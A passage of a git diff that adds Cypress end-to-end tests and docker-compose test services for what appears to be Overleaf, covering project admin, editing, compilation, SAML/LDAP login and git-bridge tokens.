cy.get('input[name="user_id"]').type(user2) + cy.get('button[type="submit"]').should('not.be.disabled') + cy.get('button[type="submit"]').click() + cy.findByText('Transfer project to this user?') + cy.get('button').contains('Confirm').click() + + cy.log('check the project is displayed in the new owner projects tab') + cy.get('input[name="email"]').type(user2 + '{enter}') + cy.findByText(user2).click() + cy.get('[role="tab"]').contains('Projects').click() + cy.get(`a[href="/admin/project/${testProjectId}"]`) + }) + }) + + describe('project page', () => { + beforeEach(() => { + login(admin) + cy.visit(`/admin/project/${testProjectId}`) + }) + + it('displays expected tabs', () => { + const tabs = ['Project Info', 'Deleted Docs', 'Audit Log'] + cy.get('[role="tab"]').each((el, index) => { + cy.wrap(el).findByText(tabs[index]).click() + }) + cy.get('[role="tab"]').should('have.length', tabs.length) + }) + }) + + it('restore deleted projects', () => { + login(user1) + cy.visit('/project') + + cy.log('select project to delete') + findProjectRow(deletedProjectName).within(() => + cy.get('input[type="checkbox"]').first().check() + ) + + cy.log('delete project') + findProjectRow(deletedProjectName).within(() => + cy.findByRole('button', { name: 'Trash' }).click() + ) + cy.get('button').contains('Confirm').click() + cy.findByText(deletedProjectName).should('not.exist') + + cy.log('navigate to thrashed projects and delete the project') + cy.get('.project-list-sidebar-react').within(() => { + cy.findByText('Trashed Projects').click() + }) + findProjectRow(deletedProjectName).within(() => + cy.findByRole('button', { name: 'Delete' }).click() + ) + cy.get('button').contains('Confirm').click() + cy.findByText(deletedProjectName).should('not.exist') + + cy.log('login as an admin and navigate to the deleted project') + login(admin) + cy.visit('/admin/user') + cy.get('input[name="email"]').type(user1 + '{enter}') + cy.get('a').contains(user1).click() + cy.findByText('Deleted Projects').click() + cy.get('a').contains(deletedProjectName).click() + + cy.log('undelete the project') + cy.findByText('Undelete').click() + cy.findByText('Undelete').should('not.exist') + cy.url().should('contain', `/admin/project/${projectToDeleteId}`) + + cy.log('login as the user and verify the project is restored') + login(user1) + cy.visit('/project') + cy.get('.project-list-sidebar-react').within(() => { + cy.findByText('Trashed Projects').click() + }) + cy.findByText(`${deletedProjectName} (Restored)`) + }) + }) +}) diff --git a/server-ce/test/create-and-compile-project.spec.ts b/server-ce/test/create-and-compile-project.spec.ts new file mode 100644 index 0000000..20f8f0d --- /dev/null +++ b/server-ce/test/create-and-compile-project.spec.ts @@ -0,0 +1,124 @@ +import { ensureUserExists, login } from './helpers/login' +import { + createProject, + openProjectViaInviteNotification, +} from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { throttledRecompile } from './helpers/compile' + +describe('Project creation and compilation', function () { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({}) + ensureUserExists({ email: 'user@example.com' }) + ensureUserExists({ email: 'collaborator@example.com' }) + + it('users can create project and compile it', function () { + login('user@example.com') + createProject('test-project') + const recompile = throttledRecompile() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type('\n\\section{{}Test Section}') + recompile() + cy.get('.pdf-viewer').should('contain.text', 'Test Section') + }) + + it('create and edit markdown file', function () { + const fileName = `test-${Date.now()}.md` + const markdownContent = '# Markdown title' + login('user@example.com') + createProject('test-project') + + // FIXME: Add aria-label maybe? or at least data-test-id + cy.findByText('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.get('input').clear() + cy.get('input').type(fileName) + cy.findByText('Create').click() + }) + cy.findByText(fileName).click() + // wait until we've switched to the newly created empty file + cy.get('.cm-line').should('have.length', 1) + cy.get('.cm-line').type(markdownContent) + cy.findByText('main.tex').click() + cy.get('.cm-content').should('contain.text', '\\maketitle') + cy.findByText(fileName).click() + cy.get('.cm-content').should('contain.text', markdownContent) + }) + + it('can link and display linked image from other project', function () { + const sourceProjectName = `test-project-${Date.now()}` + const targetProjectName = `${sourceProjectName}-target` + login('user@example.com') + + createProject(sourceProjectName, { + type: 'Example Project', + open: false, + }).as('sourceProjectId') + createProject(targetProjectName) + + // link the image from `projectName` into this project + cy.findByText('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.findByText('From another project').click() + cy.findByLabelText('Select a Project').select(sourceProjectName) + cy.findByLabelText('Select a File').select('frog.jpg') + cy.findByText('Create').click() + }) + cy.findByTestId('file-tree').findByText('frog.jpg').click() + cy.findByText('Another project') + .should('have.attr', 'href') + .then(href => { + cy.get('@sourceProjectId').then(sourceProjectId => { + expect(href).to.equal(`/project/${sourceProjectId}`) + }) + }) + }) + + it('can refresh linked files as collaborator', function () { + const sourceProjectName = `test-project-${Date.now()}` + const targetProjectName = `${sourceProjectName}-target` + login('user@example.com') + createProject(sourceProjectName, { + type: 'Example Project', + open: false, + }).as('sourceProjectId') + createProject(targetProjectName).as('targetProjectId') + + // link the image from `projectName` into this project + cy.findByText('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.findByText('From another project').click() + cy.findByLabelText('Select a Project').select(sourceProjectName) + cy.findByLabelText('Select a File').select('frog.jpg') + cy.findByText('Create').click() + }) + + cy.findByText('Share').click() + cy.findByRole('dialog').within(() => { + cy.findByTestId('collaborator-email-input').type( + 'collaborator@example.com,' + ) + cy.findByText('Invite').click({ force: true }) + cy.findByText('Invite not yet accepted.') + }) + + cy.visit('/project') + cy.findByText('Account').click() + cy.findByText('Log Out').click() + + login('collaborator@example.com') + openProjectViaInviteNotification(targetProjectName) + cy.get('@targetProjectId').then(targetProjectId => { + cy.url().should('include', targetProjectId) + }) + + cy.findByTestId('file-tree').findByText('frog.jpg').click() + cy.findByText('Another project') + .should('have.attr', 'href') + .then(href => { + cy.get('@sourceProjectId').then(sourceProjectId => { + expect(href).to.equal(`/project/${sourceProjectId}`) + }) + }) + }) +}) diff --git a/server-ce/test/customization.spec.ts b/server-ce/test/customization.spec.ts new file mode 100644 index 0000000..03c9bc3 --- /dev/null +++ b/server-ce/test/customization.spec.ts @@ -0,0 +1,26 @@ +import { isExcludedBySharding, startWith } from './helpers/config' + +describe('Customization', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + vars: { + OVERLEAF_APP_NAME: 'CUSTOM APP NAME', + OVERLEAF_LEFT_FOOTER: JSON.stringify([{ text: 'CUSTOM LEFT FOOTER' }]), + OVERLEAF_RIGHT_FOOTER: JSON.stringify([{ text: 'CUSTOM RIGHT FOOTER' }]), + }, + }) + + it('should display custom name', () => { + cy.visit('/') + cy.get('nav').findByText('CUSTOM APP NAME') + }) + + it('should display custom left footer', () => { + cy.visit('/') + cy.get('footer').findByText('CUSTOM LEFT FOOTER') + }) + it('should display custom right footer', () => { + cy.visit('/') + cy.get('footer').findByText('CUSTOM RIGHT FOOTER') + }) +}) diff --git a/server-ce/test/cypress.config.js b/server-ce/test/cypress.config.js new file mode 100644 index 0000000..07ea87b --- /dev/null +++ b/server-ce/test/cypress.config.js @@ -0,0 +1,28 @@ +const { defineConfig } = require('cypress') +const { readPdf, readFileInZip } = require('./helpers/read-file') + +const specPattern = process.env.SPEC_PATTERN || './**/*.spec.{js,ts,tsx}' + +module.exports = defineConfig({ + defaultCommandTimeout: 10_000, + fixturesFolder: 'cypress/fixtures', + video: process.env.CYPRESS_VIDEO === 'true', + screenshotsFolder: 'cypress/results', + videosFolder: 'cypress/results', + videoUploadOnPasses: false, + viewportHeight: 768, + viewportWidth: 1024, + e2e: { + baseUrl: 'http://localhost', + setupNodeEvents(on, config) { + on('task', { + readPdf, + readFileInZip, + }) + }, + specPattern, + }, + retries: { + runMode: 3, + }, +}) diff --git a/server-ce/test/cypress/.gitignore b/server-ce/test/cypress/.gitignore new file mode 100644 index 0000000..5b36de2 --- /dev/null +++ b/server-ce/test/cypress/.gitignore @@ -0,0 +1,3 @@ +downloads/ +results/ +data/ diff --git a/server-ce/test/cypress/support/e2e.js b/server-ce/test/cypress/support/e2e.js new file mode 100644 index 0000000..f8f1eac --- /dev/null +++ b/server-ce/test/cypress/support/e2e.js @@ -0,0 +1,12 @@ +import '@testing-library/cypress/add-commands' + +Cypress.on('uncaught:exception', (err, runnable) => { + if (err.message.includes('ResizeObserver')) { + // spurious error from PDF preview + return false + } + if (err.message.includes('rcube_webmail')) { + // spurious error from mailtrap + return false + } +}) diff --git a/server-ce/test/docker-compose.native.yml b/server-ce/test/docker-compose.native.yml new file mode 100644 index 0000000..c229f6a --- /dev/null +++ b/server-ce/test/docker-compose.native.yml @@ -0,0 +1,25 @@ +version: '2.2' +services: + sharelatex: + ports: + - "127.0.0.1:80:80" + environment: + OVERLEAF_SITE_URL: 'http://localhost' + + host-admin: + ports: + - "127.0.0.1:8081:80" + environment: + NATIVE_CYPRESS: 'true' + ACCESS_CONTROL_ALLOW_ORIGIN: 'http://localhost' + + saml: + ports: + - 127.0.0.1:8082:80 + environment: + SAML_BASE_URL_PATH: 'http://localhost:8082/simplesaml/' + SAML_TEST_SP_LOCATION: 'http://localhost/saml/callback' + + mailtrap: + ports: + - 127.0.0.1:8083:80 diff --git a/server-ce/test/docker-compose.yml b/server-ce/test/docker-compose.yml new file mode 100644 index 0000000..43f494a --- /dev/null +++ b/server-ce/test/docker-compose.yml @@ -0,0 +1,149 @@ +version: '2.2' +services: + sharelatex: + image: ${IMAGE_TAG_CE:-sharelatex/sharelatex:latest} + stop_grace_period: 0s + depends_on: + mongo: + condition: service_healthy + redis: + condition: service_started + mailtrap: + condition: service_started + environment: + OVERLEAF_SITE_URL: 'http://sharelatex' + OVERLEAF_APP_NAME: Overleaf Community Edition + OVERLEAF_MONGO_URL: mongodb://mongo/sharelatex?directConnection=true + OVERLEAF_REDIS_HOST: redis + REDIS_HOST: redis + OVERLEAF_EMAIL_FROM_ADDRESS: 'welcome@example.com' + OVERLEAF_EMAIL_SMTP_HOST: 'mailtrap' + OVERLEAF_EMAIL_SMTP_PORT: '25' + OVERLEAF_EMAIL_SMTP_IGNORE_TLS: 'true' + ENABLED_LINKED_FILE_TYPES: 'project_file,project_output_file' + ENABLE_CONVERSIONS: 'true' + EMAIL_CONFIRMATION_DISABLED: 'true' + healthcheck: + test: curl --fail http://localhost:3000/status + interval: 3s + timeout: 3s + retries: 30 + + mailtrap: + image: mailtrap + environment: + MAILTRAP_PASSWORD: 'password-for-mailtrap' + + mongo: + image: mongo:6.0 + command: '--replSet overleaf' + volumes: + - ../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the replica set. + # This override is not needed when running the setup after starting up mongo. + - mongo:127.0.0.1 + healthcheck: + test: echo 'db.stats().ok' | mongosh localhost:27017/test --quiet + interval: 3s + timeout: 3s + retries: 30 + + redis: + image: redis:7.2.1 + + git-bridge: + image: quay.io/sharelatex/git-bridge:latest + environment: + GIT_BRIDGE_API_BASE_URL: "http://sharelatex:3000/api/v0/" # "http://sharelatex/api/v0/" for version 4.1.6 and earlier + GIT_BRIDGE_OAUTH2_SERVER: "http://sharelatex" + GIT_BRIDGE_POSTBACK_BASE_URL: "http://git-bridge:8000" + GIT_BRIDGE_ROOT_DIR: "/data/git-bridge" + user: root + command: ["/server-pro-start.sh"] + + e2e: + image: cypress/included:13.13.2 + stop_grace_period: 0s + entrypoint: npm + command: run cypress:run + working_dir: /e2e + volumes: + - ./:/e2e + environment: + CYPRESS_SHARD: + CYPRESS_BASE_URL: http://sharelatex + SPEC_PATTERN: '**/*.spec.{js,jsx,ts,tsx}' + depends_on: + sharelatex: + condition: service_healthy + host-admin: + condition: service_healthy + + e2e-open: + image: cypress/included:13.13.2 + stop_grace_period: 0s + entrypoint: npm + command: run cypress:open + working_dir: /e2e + volumes: + - ./:/e2e + - /tmp/.X11-unix:/tmp/.X11-unix + user: "${DOCKER_USER:-1000:1000}" + environment: + CYPRESS_SHARD: + CYPRESS_BASE_URL: http://sharelatex + SPEC_PATTERN: '**/*.spec.{js,jsx,ts,tsx}' + DISPLAY: ${DISPLAY:-:0} + depends_on: + sharelatex: + condition: service_healthy + host-admin: + condition: service_healthy + + host-admin: + build: . + entrypoint: ["node", "--watch", "host-admin.js"] + # See comment in Makefile regarding matching file paths + working_dir: $PWD + volumes: + - $PWD:$PWD + - /var/run/docker.sock:/var/run/docker.sock + stop_grace_period: 0s + environment: + PWD: + CYPRESS_SHARD: + COMPOSE_PROJECT_NAME: + TEX_LIVE_DOCKER_IMAGE: + ALL_TEX_LIVE_DOCKER_IMAGES: + IMAGE_TAG_CE: ${IMAGE_TAG_CE:-sharelatex/sharelatex:latest} + IMAGE_TAG_PRO: ${IMAGE_TAG_PRO:-quay.io/sharelatex/sharelatex-pro:latest} + depends_on: + mongo: + condition: service_healthy + healthcheck: + test: curl --fail http://localhost/status + interval: 3s + timeout: 3s + retries: 30 + + saml: + restart: always + image: gcr.io/overleaf-ops/saml-test + environment: + SAML_TEST_SP_ENTITY_ID: 'sharelatex-test-saml' + SAML_BASE_URL_PATH: 'http://saml/simplesaml/' + SAML_TEST_SP_LOCATION: 'http://sharelatex/saml/callback' + + ldap: + restart: always + image: rroemhild/test-openldap:1.1 + # Workaround large memory allocation (using the max-open-files-limit as socket buffer scale). + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63877553 + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63871343 + command: + - 'bash' + - '-c' + - 'ulimit -n 1024 && exec bash /run.sh' diff --git a/server-ce/test/editor.spec.ts b/server-ce/test/editor.spec.ts new file mode 100644 index 0000000..648c55a --- /dev/null +++ b/server-ce/test/editor.spec.ts @@ -0,0 +1,382 @@ +import { + createNewFile, + createProject, + enableLinkSharing, + openFile, + openProjectById, + openProjectViaLinkSharingAsUser, + toggleTrackChanges, +} from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { v4 as uuid } from 'uuid' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' +import { prepareWaitForNextCompileSlot } from './helpers/compile' + +describe('editor', () => { + if (isExcludedBySharding('PRO_DEFAULT_1')) return + startWith({ pro: true }) + ensureUserExists({ email: 'user@example.com' }) + ensureUserExists({ email: 'collaborator@example.com' }) + + let projectName: string + let projectId: string + let recompile: () => void + let waitForCompileRateLimitCoolOff: (fn: () => void) => void + beforeWithReRunOnTestRetry(function () { + projectName = `project-${uuid()}` + login('user@example.com') + createProject(projectName, { type: 'Example Project', open: false }).then( + id => (projectId = id) + ) + ;({ recompile, waitForCompileRateLimitCoolOff } = + prepareWaitForNextCompileSlot()) + }) + + beforeEach(() => { + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + }) + + describe('spelling', function () { + function changeSpellCheckLanguageTo(lng: string) { + cy.log(`change project language to '${lng}'`) + cy.get('button').contains('Menu').click() + cy.get('select[id=settings-menu-spellCheckLanguage]').select(lng) + cy.get('[id="left-menu"]').type('{esc}') // close left menu + } + + afterEach(function () { + changeSpellCheckLanguageTo('Off') + }) + + it('word dictionary and spelling', () => { + changeSpellCheckLanguageTo('English (American)') + createNewFile() + const word = createRandomLetterString() + + cy.log('edit project file') + cy.get('.cm-line').type(word) + + cy.get('.ol-cm-spelling-error').should('exist') + + changeSpellCheckLanguageTo('Spanish') + + cy.log('add word to dictionary') + cy.get('.ol-cm-spelling-error').contains(word).rightclick() + cy.findByText('Add to Dictionary').click() + cy.get('.ol-cm-spelling-error').should('not.exist') + + cy.log('remove word from dictionary') + cy.get('button').contains('Menu').click() + cy.get('button').contains('Edit').click() + cy.get('[id="dictionary-modal"]').within(() => { + cy.findByText(word) + .parent() + .within(() => cy.get('button').click()) + + // the modal has 2 close buttons, this ensures the one with the visible label is + // clicked, otherwise it would need `force: true` + cy.get('.btn').contains('Close').click() + }) + + cy.log('close left panel') + cy.get('[id="left-menu"]').type('{esc}') + + cy.log('rewrite word to force spelling error') + cy.get('.cm-line').type('{selectAll}{del}' + word + '{enter}') + + cy.get('.ol-cm-spelling-error').should('contain.text', word) + }) + }) + + describe('collaboration', () => { + beforeWithReRunOnTestRetry(function () { + enableLinkSharing().then(({ linkSharingReadAndWrite }) => { + const email = 'collaborator@example.com' + login(email) + openProjectViaLinkSharingAsUser( + linkSharingReadAndWrite, + projectName, + email + ) + }) + + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + }) + + it('track-changes', () => { + cy.log('disable track-changes before populating doc') + toggleTrackChanges(false) + + const fileName = createNewFile() + const oldContent = 'oldContent' + cy.get('.cm-line').type(`${oldContent}\n\nstatic`) + + cy.log('recompile to force flush') + recompile() + + cy.log('enable track-changes for everyone') + toggleTrackChanges(true) + + login('collaborator@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + openFile(fileName, 'static') + + cy.log('make changes in main file') + // cy.type() "clicks" in the center of the selected element before typing. This "click" discards the text as selected by the dblclick. + // Go down to the lower level event based typing, the frontend tests in web use similar events. + cy.get('.cm-editor').as('editor') + cy.get('@editor').findByText(oldContent).dblclick() + cy.get('@editor').trigger('keydown', { key: 'Delete' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + + cy.log('recompile to force flush') + recompile() + + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + openFile(fileName, 'static') + + cy.log('reject changes') + cy.contains('.toolbar-item', 'Review').click() + cy.get('.cm-content').should('not.contain.text', oldContent) + cy.findByText('Reject change').click({ force: true }) + cy.contains('.toolbar-item', 'Review').click() + + cy.log('recompile to force flush') + recompile() + + cy.log('verify the changes are applied') + cy.get('.cm-content').should('contain.text', oldContent) + + cy.log('disable track-changes for everyone again') + toggleTrackChanges(false) + }) + + it('track-changes rich text', () => { + cy.log('disable track-changes before populating doc') + toggleTrackChanges(false) + + const fileName = createNewFile() + const oldContent = 'oldContent' + cy.get('.cm-line').type(`\\section{{}${oldContent}}\n\nstatic`) + + cy.log('recompile to force flush') + recompile() + + cy.log('enable track-changes for everyone') + toggleTrackChanges(true) + + login('collaborator@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + cy.log('enable visual editor and make changes in main file') + cy.findByText('Visual Editor').click() + + openFile(fileName, 'static') + + // cy.type() "clicks" in the center of the selected element before typing. This "click" discards the text as selected by the dblclick. + // Go down to the lower level event based typing, the frontend tests in web use similar events. + cy.get('.cm-editor').as('editor') + cy.get('@editor').findByText(oldContent).dblclick() + cy.get('@editor').trigger('keydown', { key: 'Delete' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + + cy.log('recompile to force flush') + recompile() + + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + openFile(fileName, 'static') + + cy.log('reject changes') + cy.contains('.toolbar-item', 'Review').click() + cy.get('.cm-content').should('not.contain.text', oldContent) + cy.findAllByText('Reject change').first().click({ force: true }) + cy.contains('.toolbar-item', 'Review').click() + + cy.log('recompile to force flush') + recompile() + + cy.log('verify the changes are applied in the visual editor') + cy.findByText('Visual Editor').click() + cy.get('.cm-content').should('contain.text', oldContent) + + cy.log('disable track-changes for everyone again') + toggleTrackChanges(false) + }) + }) + + describe('editor', () => { + it('renders jpg', () => { + cy.findByTestId('file-tree').findByText('frog.jpg').click() + cy.get('[alt="frog.jpg"]') + .should('be.visible') + .and('have.prop', 'naturalWidth') + .should('be.greaterThan', 0) + }) + + it('symbol palette', () => { + createNewFile() + + cy.get('button[aria-label="Toggle Symbol Palette"]').click({ + force: true, + }) + cy.get('button').contains('𝜉').click() + cy.get('.cm-content').should('contain.text', '\\xi') + + cy.log('recompile to force flush and avoid "unsaved changes" prompt') + recompile() + }) + }) + + describe('add new file to project', () => { + beforeEach(() => { + cy.get('button').contains('New file').click({ force: true }) + }) + + it('can upload file', () => { + const name = `${uuid()}.txt` + const content = `Test File Content ${name}` + cy.get('button').contains('Upload').click({ force: true }) + cy.get('input[type=file]') + .first() + .selectFile( + { + contents: Cypress.Buffer.from(content), + fileName: name, + lastModified: Date.now(), + }, + { force: true } + ) + // force: The file-tree pane is too narrow to display the full name. + cy.findByTestId('file-tree').findByText(name).click({ force: true }) + cy.findByText(content) + }) + + it('should not display import from URL', () => { + cy.findByText('From external URL').should('not.exist') + }) + }) + + describe('left menu', () => { + beforeEach(() => { + cy.get('button').contains('Menu').click() + }) + + it('can download project sources', () => { + cy.get('a').contains('Source').click() + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/${projectName}.zip`, + fileToRead: 'main.tex', + }).should('contain', 'Your introduction goes here') + }) + + it('can download project PDF', () => { + cy.log('ensure project is compiled') + cy.get('.pdf-viewer').should('contain.text', 'Your Paper') + + cy.get('.nav-downloads').within(() => { + cy.findByText('PDF').click() + const pdfName = projectName.replaceAll('-', '_') + cy.task('readPdf', `cypress/downloads/${pdfName}.pdf`).should( + 'contain', + 'Your introduction goes here' + ) + }) + }) + + it('word count', () => { + cy.log('ensure project is compiled') + cy.get('.pdf-viewer').should('contain.text', 'Your Paper') + + cy.findByText('Word Count').click() + + cy.get('#word-count-modal').within(() => { + cy.findByText('Total Words:') + cy.findByText('607') + cy.findByText('Headers:') + cy.findByText('14') + cy.findByText('Math Inline:') + cy.findByText('6') + cy.findByText('Math Display:') + cy.findByText('1') + }) + }) + }) + + describe('layout selector', () => { + it('show editor only and switch between editor and pdf', () => { + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Layout').click() + cy.findByText('Editor only').click() + + cy.get('.pdf-viewer').should('not.be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Switch to PDF').click() + + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('not.be.visible') + + cy.findByText('Switch to editor').click() + + cy.get('.pdf-viewer').should('not.be.visible') + cy.get('.cm-editor').should('be.visible') + }) + + it('show PDF only and go back to Editor & PDF', () => { + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Layout').click() + cy.findByText('PDF only').click() + + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('not.be.visible') + + cy.findByText('Layout').click() + cy.findByText('Editor & PDF').click() + + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + }) + + it('PDF in a separate tab (tests editor only)', () => { + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Layout').click() + cy.findByText('PDF in separate tab').click() + + cy.get('.pdf-viewer').should('not.exist') + cy.get('.cm-editor').should('be.visible') + }) + }) +}) + +function createRandomLetterString() { + const chars = 'abcdefghijklmnopqrstuvwxyz' + let result = '' + for (let i = 0; i < 12; i++) { + result += chars.charAt(Math.floor(Math.random() * chars.length)) + } + return result +} diff --git a/server-ce/test/external-auth.spec.ts b/server-ce/test/external-auth.spec.ts new file mode 100644 index 0000000..f26947e --- /dev/null +++ b/server-ce/test/external-auth.spec.ts @@ -0,0 +1,73 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { createProject } from './helpers/project' + +describe('SAML', () => { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + const samlURL = Cypress.env('SAML_URL') || 'http://saml' + + startWith({ + pro: true, + vars: { + EXTERNAL_AUTH: 'saml', + OVERLEAF_SAML_ENTRYPOINT: `${samlURL}/simplesaml/saml2/idp/SSOService.php`, + OVERLEAF_SAML_CALLBACK_URL: `${Cypress.config().baseUrl}/saml/callback`, + OVERLEAF_SAML_ISSUER: 'sharelatex-test-saml', + OVERLEAF_SAML_IDENTITY_SERVICE_NAME: 'SAML Test Server', + OVERLEAF_SAML_EMAIL_FIELD: 'email', + OVERLEAF_SAML_FIRST_NAME_FIELD: 'givenName', + OVERLEAF_SAML_LAST_NAME_FIELD: 'sn', + OVERLEAF_SAML_UPDATE_USER_DETAILS_ON_LOGIN: 'true', + OVERLEAF_SAML_CERT: + 'MIIDXTCCAkWgAwIBAgIJAOvOeQ4xFTzsMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNVBAYTAkdCMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTYxMTE1MTQxMjU5WhcNMjYxMTE1MTQxMjU5WjBFMQswCQYDVQQGEwJHQjETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCT6MBe5G9VoLU8MfztOEbUhnwLp17ak8eFUqxqeXkkqtWB0b/cmIBU3xoQoO3dIF8PBzfqehqfYVhrNt/TFgcmDfmJnPJRL1RJWMW3VmiP5odJ3LwlkKbZpkeT3wZ8HEJIR1+zbpxiBNkbd2GbdR1iumcsHzMYX1A2CBj+ZMV5VijC+K4P0e9c05VsDEUtLmfeAasJAiumQoVVgAe/BpiXjICGGewa6EPFI7mKkifIRKOGxdRESwZZjxP30bI31oDN0cgKqIgSJtJ9nfCn9jgBMBkQHu42WMuaWD4jrGd7+vYdX+oIfArs9aKgAH5kUGhGdew2R9SpBefrhbNxG8QIDAQABo1AwTjAdBgNVHQ4EFgQU+aSojSyyLChP/IpZcafvSdhj7KkwHwYDVR0jBBgwFoAU+aSojSyyLChP/IpZcafvSdhj7KkwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEABl3+OOVLBWMKs6PjA8lPuloWDNzSr3v76oUcHqAb+cfbucjXrOVsS9RJ0X9yxvCQyfM9FfY43DbspnN3izYhdvbJD8kKLNf0LA5st+ZxLfy0ACyL2iyAwICaqndqxAjQYplFAHmpUiu1DiHckyBPekokDJd+ze95urHMOsaGS5RWPoKJVE0bkaAeZCmEu0NNpXRSBiuxXSTeSAJfv6kyE/rkdhzUKyUl/cGQFrsVYfAFQVA+W6CKOh74ErSEzSHQQYndl7nD33snD/YqdU1ROxV6aJzLKCg+sdj+wRXSP2u/UHnM4jW9TGJfhO42jzL6WVuEvr9q4l7zWzUQKKKhtQ==', + }, + }) + + it('login', () => { + cy.visit('/') + cy.findByText('Log in with SAML Test Server').click() + + cy.origin(samlURL, () => { + cy.get('input[name="username"]').type('sally') + cy.get('input[name="password"]').type('sally123') + cy.get('button[type="submit"]').click() + }) + + cy.log('wait for login to finish') + cy.url().should('contain', '/project') + + createProject('via SAML') + }) +}) + +describe('LDAP', () => { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + startWith({ + pro: true, + vars: { + EXTERNAL_AUTH: 'ldap', + OVERLEAF_LDAP_URL: 'ldap://ldap:389', + OVERLEAF_LDAP_SEARCH_BASE: 'ou=people,dc=planetexpress,dc=com', + OVERLEAF_LDAP_SEARCH_FILTER: '(uid={{username}})', + OVERLEAF_LDAP_BIND_DN: 'cn=admin,dc=planetexpress,dc=com', + OVERLEAF_LDAP_BIND_CREDENTIALS: 'GoodNewsEveryone', + OVERLEAF_LDAP_EMAIL_ATT: 'mail', + OVERLEAF_LDAP_NAME_ATT: 'cn', + OVERLEAF_LDAP_LAST_NAME_ATT: 'sn', + OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN: 'true', + }, + }) + + it('login', () => { + cy.visit('/') + cy.findByText('Log in LDAP') + + cy.get('input[name="login"]').type('fry') + cy.get('input[name="password"]').type('fry') + cy.get('button[type="submit"]').click() + + cy.log('wait for login to finish') + cy.url().should('contain', '/project') + + createProject('via LDAP') + }) +}) diff --git a/server-ce/test/git-bridge.spec.ts b/server-ce/test/git-bridge.spec.ts new file mode 100644 index 0000000..071091b --- /dev/null +++ b/server-ce/test/git-bridge.spec.ts @@ -0,0 +1,396 @@ +import { v4 as uuid } from 'uuid' +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { + createProject, + enableLinkSharing, + openProjectByName, + openProjectViaLinkSharingAsUser, + shareProjectByEmailAndAcceptInviteViaDash, +} from './helpers/project' + +import git from 'isomorphic-git' +import http from 'isomorphic-git/http/web' +import LightningFS from '@isomorphic-git/lightning-fs' +import { throttledRecompile } from './helpers/compile' + +describe('git-bridge', function () { + const ENABLED_VARS = { + GIT_BRIDGE_ENABLED: 'true', + GIT_BRIDGE_HOST: 'git-bridge', + GIT_BRIDGE_PORT: '8000', + V1_HISTORY_URL: 'http://sharelatex:3100/api', + } + + function gitURL(projectId: string) { + const url = new URL(Cypress.config().baseUrl!) + url.username = 'git' + url.pathname = `/git/${projectId}` + return url + } + + describe('enabled in Server Pro', function () { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + startWith({ + pro: true, + vars: ENABLED_VARS, + }) + ensureUserExists({ email: 'user@example.com' }) + + function clearAllTokens() { + cy.get('button.linking-git-bridge-revoke-button').each(el => { + cy.wrap(el).click() + cy.findByText('Delete token').click() + }) + } + + function maybeClearAllTokens() { + cy.visit('/user/settings') + cy.findByText('Git Integration') + cy.get('button') + .contains(/Generate token|Add another token/) + .then(btn => { + if (btn.text() === 'Add another token') { + clearAllTokens() + } + }) + } + + beforeEach(function () { + login('user@example.com') + }) + + it('should render the git-bridge UI in the settings', () => { + maybeClearAllTokens() + cy.visit('/user/settings') + cy.findByText('Git Integration') + cy.get('button').contains('Generate token').click() + cy.get('code') + .contains(/olp_[a-zA-Z0-9]{16}/) + .as('newToken') + cy.findAllByText('Close').last().click() + cy.get('@newToken').then(token => { + // There can be more than one token with the same prefix when retrying + cy.findAllByText( + `${token.text().slice(0, 'olp_1234'.length)}${'*'.repeat(12)}` + ).should('have.length.at.least', 1) + }) + cy.get('button').contains('Generate token').should('not.exist') + cy.get('button').contains('Add another token').should('exist') + 